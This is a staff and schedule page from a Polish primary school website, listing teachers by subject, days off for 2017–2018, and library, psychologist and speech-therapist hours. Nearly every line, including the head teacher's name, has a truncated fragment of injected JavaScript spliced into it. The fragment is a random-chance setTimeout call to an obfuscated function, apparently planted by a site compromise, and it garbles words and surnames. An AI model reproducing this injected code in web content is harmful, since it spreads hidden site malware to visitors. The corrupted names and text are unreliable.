Pracownicy

Dyrektor szkoły

mgr Ewa Redom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decka

Kadra Pedagogiczna

Język polskidom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Małgorzata Karwowska

Matematykadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Sylwia Ziółkowska/mgr Henryka Rożniak

Historiadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Katarzyna Dyja

Przyrodadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Iwona Wiśniewska/mgr Katarzyna Dyja

Chemiadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Małgorzata Korpolińska

Fizykadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Małgorzata Korpolińska

Biologiadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Małgorzata Korpolińska

Geografiadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Sylwia Ziółkowska

Język niemieckidom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Iwona Wiśniewska

Język angielskidom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Monika Jagiełło – Salak

Zajęcia komputerowedom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Radosław Ulicki/mgr Anita Marlęga

Zajęcia technicznedom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Iwona Wiśniewska

Muzykadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Ewa Golis

Plastykadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Magdalena Domańska

Wychowanie fizycznedom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Radosław Ulicki/mgr Tomasz Zieliński

Religiadom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Ewa Golis

Edukacja wczesnoszkolna (klasa I)dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Joanna Siennicka

Edukacja wczesnoszkolna (klasa II)dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Justyna Tomaszewska

Edukacja wczesnoszkolna (klasa III)dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Katarzyna Dyja

Oddział przedszkolnydom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Magdalena Domańska

Punkt przedszkolnydom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} – mgr Joanna Zasadowska/mgr Edyta Janiszewska

Dni wolne

2 listopada 2017
3 listopada 2017
21 grudnia 2017
22 grudnia 2017
30 kwietnia 2018
2 maja 2018
4 maja 2018
1 czerwca 2018

Biblioteka szkolna

Poniedziałek 13.15 – 14.15
Środa 12.45 – 13.45

Psycholog

Środa 7.30 – 10.30

Logopeda

Wtorek 7.30 – 8.00
13.30 – 14.30
Środa 13.00 – 13.30